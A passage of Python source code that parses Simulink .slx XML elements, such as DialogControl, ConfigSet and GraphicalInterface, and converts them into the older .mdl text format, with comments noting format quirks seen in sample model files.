for x in self.blockDefaults:
str_ += f'{x.strmdl}\n'
for x in self.annotationDefaults:
str_ += f'{x.strmdl}\n'
for x in self.lineDefaults:
str_ += f'{x.strmdl}\n'
for x in self.maskDefaults:
str_ += f'{x.strmdl}\n'
for x in self.blockParameterDefaults:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class BlockParameterDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<BlockParameterDefaults') and strval.endswith('</BlockParameterDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.blocks = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Block':
self.blocks.append(Block.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'BlockParameterDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return BlockParameterDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'BlockParameterDefaults {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.blocks:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Branch(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Branch') and strval.endswith('</Branch>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.branches = [] # <Branch> can contain <Branch>
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Branch':
self.branches.append(Branch.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Branch' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Branch(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Branch {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.branches:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Callback(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Callback') and strval.endswith('</Callback>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Callback(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Callback "{self.content}"'
class Capabilities(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Capabilities') and strval.endswith('</Capabilities>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Capabilities(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Capabilities "{self.content}"'
class Cell(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Cell') and strval.endswith('</Cell>')
super().__init__(strval, parent_xml)
self.class_attr = None
for x in self.attrs:
if x.name == 'Class':
self.class_attr = x
@classmethod
def from_XmlElement(cls, xml_element):
return Cell(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
quoted = f'Cell "{self.content}"'
unquoted = f'Cell {self.content}'
boxed = f'Cell [{self.content}]'
# as seen from corpus/matlab-central/fir_filter_example.slx,
# if attribute 'Class' = 'double', then content is boxed
# if attribute 'Class' = 'char', then content is quoted
if self.class_attr and self.class_attr.value in ['double']:
if self.content.startswith('[') and self.content.endswith(']'):
return unquoted
return boxed
return quoted # default
class ConfigSet(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ConfigSet') and strval.endswith('</ConfigSet>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.objects = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ConfigSet' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ConfigSet(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Array {\n'
str_ += 'Type "Handle"\n'
str_ += f'Dimension {len(self.inner_xmls_of_type_xml)}\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class ConfigurationSet(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ConfigurationSet') and strval.endswith('</ConfigurationSet>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.objects = []
self.arrays = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ConfigurationSet' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ConfigurationSet(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class ConcurrentExecutionSettings(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ConcurrentExecutionSettings') and strval.endswith('</ConcurrentExecutionSettings>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.objects = []
self.arrays = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ConcurrentExecutionSettings' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ConcurrentExecutionSettings(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class ConfigManagerSettings(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ConfigManagerSettings') and strval.endswith('</ConfigManagerSettings>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ConfigManagerSettings' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ConfigManagerSettings(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class Connector(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Connector') and strval.endswith('</Connector>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Connector' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Connector(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Connector {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class ControlOptions(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ControlOptions') and strval.endswith('</ControlOptions>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ControlOptions' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ControlOptions(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
# special : no surrounding braces, just contents
str_ = '\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class CustomProperty(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<CustomProperty') and strval.endswith('</CustomProperty>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.enumStrPairss = [] # first found in corpus/github-downloaded/CSEI_u.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'EnumStrPairs':
self.enumStrPairss.append(EnumStrPairs.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'CustomProperty' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return CustomProperty(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'CustomProperty {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.enumStrPairss:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Description(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Description') and strval.endswith('</Description>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Description(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Description "{self.content}"'
class DialogControl(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<DialogControl') and strval.endswith('</DialogControl>')
super().__init__(strval, parent_xml)
self.object_idmdl = Utils.object_idmdl_by_xml_element(self)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.controlOptions = []
self.prompts = []
self.dialogControls = [] # there can be nested <DialogControl> see: applications/sldemo_autotrans
self.callbacks = []
self.tooltips = []
self.filePaths = [] # first found in corpus/matlab-central/Contact_Forces_Lib.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ControlOptions':
self.controlOptions.append(ControlOptions.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Prompt':
self.prompts.append(Prompt.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'DialogControl':
self.dialogControls.append(DialogControl.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Callback':
self.callbacks.append(Callback.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Tooltip':
self.tooltips.append(Tooltip.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'FilePath':
self.filePaths.append(FilePath.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'DialogControl' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return DialogControl(xml_element.strval, xml_element.parent_xml)
def strmdl(self, is_array_element):
"""
Args:
is_array_element (bool): True if the returned str is to be wrapped inside Array{}, else False
"""
# special
str_ = 'Object {\n'
# OBSERVATION: If multiple <DialogControl> are contained in a parent tag (eg. <Mask>),
# they are wrapped in Array{}
#
# <DialogControl> become Object {} in mdl and they contain $ObjectID, $PropName, and
# $ClassName.
#
# When they are wrapped in Array{}, in original mdl files (generated by Simulink)
# - $ PropName is moved out (becomes a MANDATORY attribute of Array and renamed to
# Propname i.e. no leading $)
# - $ClassName is NOT removed. (THIS IS DIFFERENT IN <MaskParameter>)
# - $ObjectID remains the same.
#
# Although keeping $PropName inside these wrapped Object{}s
# does not harm, we have chosen to remove it just like in the mdl file produced by Simulink.
str_ += f'$ObjectID {self.object_idmdl}\n' # TODO: figure out what ObjectID is
str_ += f'$ClassName "{self.array_type_or_object_className()}"\n'
if not is_array_element:
str_ += f'$PropName "DialogControls"\n'
for x in self.attrs:
# 'Type' info goes to $ClassName
if x.name not in ['Type']:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.controlOptions:
str_ += f'{x.strmdl}\n'
# OBSERVATION: Some <Prompt> in <DialogControl> do not appear in the mdl file
# for example, when <DialogControl> has Type="CheckBox", the <Prompt> contained in the
# <DialogControl> does not appear in the mdl file. (see applications/aero_dap3dof)
# However, at this time, we are not sure when exactly not to include <Prompt>'s transformation
# in the mdl format. So, we are always including it.
# TODO: If this results in problem(s), investigate further and when <Prompt>'s transformation
# should appear and when it should not and make required changes.
for x in self.prompts:
str_ += f'{x.strmdl}\n'
if self.dialogControls and len(self.dialogControls) > 1:
str_ += 'Array {\n'
str_ += f'Type "Simulink.dialog.Control"\n'
# PropName attribute is mandatory.
# Notice that there is no leading $
str_ += 'PropName "DialogControls"\n'
str_ += f'Dimension {len(self.dialogControls)}\n'
for x in self.dialogControls:
str_ += f'{x.strmdl(is_array_element=True)}\n'
str_ += '}\n'
else:
for x in self.dialogControls:
str_ += f'{x.strmdl(is_array_element=False)}\n'
for x in self.callbacks:
str_ += f'{x.strmdl}\n'
for x in self.tooltips:
str_ += f'{x.strmdl}\n'
for x in self.filePaths:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
def array_type_or_object_className(self):
"""Return what value is needed for
- Array/Type (if this DialogControl is to be wrapped in array, or
- Object/$ClassName (if this DialogControl is not be wrapped in array)
"""
# OBSERVATION: $ClassName, whether it appears inside Object{} or just inside Array{} i.e.
# outside Object{} is derived from the value of 'Type' attr
# OBSERVATION: $ClassName xxx may be of the form 'Simulink.dialog.parameter.xxx' or 'Simulink.dialog.xxx'
# see applications/sldemo_autotrans, applications/aero_dap3dof
type = self.attr_value_by_name('Type')
if type in [
'Button',
'Group',
'Text',
'TabContainer', # first found in corpus/github-downloaded/adi_ad961_models.slx
'Tab', # first found in corpus/github-downloaded/adi_ad961_models.slx
'CollapsiblePanel', # first found in corpus/github-downloaded/adi_ad961_models.slx
'Control', # first found in corpus/github-downloaded/adi_ad961_models.slx
'Panel', # first found in corpus/github/Lib_Turbo_CompressorVG_TMATS.slx
'Image', # first found in corpus/github/matlab/Contact_Forces_Lib
]:
return f'Simulink.dialog.{type}'
elif type in [
'CheckBox',
'Edit',
'Slider',
'Spinbox',
'Popup', # first found in corpus/github-downloaded/adi_ad961_models.slx
'RadioButton', # first found in corpus/matlab-central/ACTimeOvercurrentRelayBlock
]:
return f'Simulink.dialog.parameter.{type}'
else:
raise Exception(f"Unknown 'Type' attribute '{type}' in <DialogControl>")
class DiagnosticSuppressor(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<DiagnosticSuppressor') and strval.endswith('</DiagnosticSuppressor>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'DiagnosticSuppressor' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return DiagnosticSuppressor(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class DialogParameters(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<DialogParameters') and strval.endswith('</DialogParameters>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'DialogParameters' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return DialogParameters(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'DialogParameters {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Display(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Display') and strval.endswith('</Display>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Display' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Display(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += f'Display "{self.content}"' # special
str_ += '\n\n'
return str_
class EditorSettings(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<EditorSettings') and strval.endswith('</EditorSettings>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'EditorSettings' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return EditorSettings(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class EngineSettings(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<EngineSettings') and strval.endswith('</EngineSettings>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'EngineSettings' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return EngineSettings(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class EnumStrPairs(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<EnumStrPairs') and strval.endswith('</EnumStrPairs>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'EnumStrPairs' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return EnumStrPairs(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'EnumStrPairs {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class ExternalFileReference(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ExternalFileReference') and strval.endswith('</ExternalFileReference>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ExternalFileReference' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ExternalFileReference(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'ExternalFileReference {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class ExternalMode(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ExternalMode') and strval.endswith('</ExternalMode>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ExternalMode' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ExternalMode(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class Field(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Field') and strval.endswith('</Field>')
super().__init__(strval, parent_xml)
self.name_attr = None
self.class_attr = None
for x in self.attrs:
if x.name == 'Name':
self.name_attr = x
if x.name == 'Class':
self.class_attr = x
@classmethod
def from_XmlElement(cls, xml_element):
return Field(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
quoted = f'{self.name_attr.value} "{self.content}"' # default
unquoted = f'{self.name_attr.value} {self.content}' # special
boxed = f'{self.name_attr.value} [{self.content}]' # special
if self.class_attr and self.class_attr.value in ['double']:
if self.content.startswith('[') and self.content.endswith(']'):
return unquoted
return boxed
return quoted
class FilePath(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<FilePath') and strval.endswith('</FilePath>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return FilePath(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'FilePath "{self.content}"'
class FunctionConnector(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<FunctionConnector') and strval.endswith('</FunctionConnector>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'FunctionConnector' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return FunctionConnector(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'FunctionConnector {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class FunctionPort(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<FunctionPort') and strval.endswith('</FunctionPort>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'FunctionPort' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return FunctionPort(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'FunctionPort {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class GraphicalInterface(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<GraphicalInterface') and strval.endswith('</GraphicalInterface>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.externalFileReferences = []
self.modelReferences = []
self.testPointedSignals = []
self.inports = []
self.outports = []
self.requireFunctions = []
self.subsystemReferences = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ExternalFileReference':
self.externalFileReferences.append(ExternalFileReference.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ModelReference':
self.modelReferences.append(ModelReference.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'TestPointedSignal':
self.testPointedSignals.append(TestPointedSignal.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Inport':
self.inports.append(Inport.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Outport':
self.outports.append(Outport.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'RequireFunction':
self.requireFunctions.append(RequireFunction.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'SubsystemReference':
self.subsystemReferences.append(SubsystemReference.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'GraphicalInterface' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return GraphicalInterface(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'GraphicalInterface {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.externalFileReferences:
str_ += f'{x.strmdl}\n'
for x in self.modelReferences:
str_ += f'{x.strmdl}\n'
for x in self.testPointedSignals:
str_ += f'{x.strmdl}\n'
for x in self.inports:
str_ += f'{x.strmdl}\n'
for x in self.outports:
str_ += f'{x.strmdl}\n'
for x in self.requireFunctions:
str_ += f'{x.strmdl}\n'
for x in self.subsystemReferences:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Help(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Help') and strval.endswith('</Help>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Help(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Help "{self.content}"'
class Initialization(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Initialization') and strval.endswith('</Initialization>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Initialization(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Initialization "{self.content}"'
class Inport(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Inport') and strval.endswith('</Inport>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Inport' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Inport(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Inport {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class InstanceData(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<InstanceData') and strval.endswith('</InstanceData>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.objects = [] # found in matlab-central/HEV_Battery_Lib.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'InstanceData' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return InstanceData(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
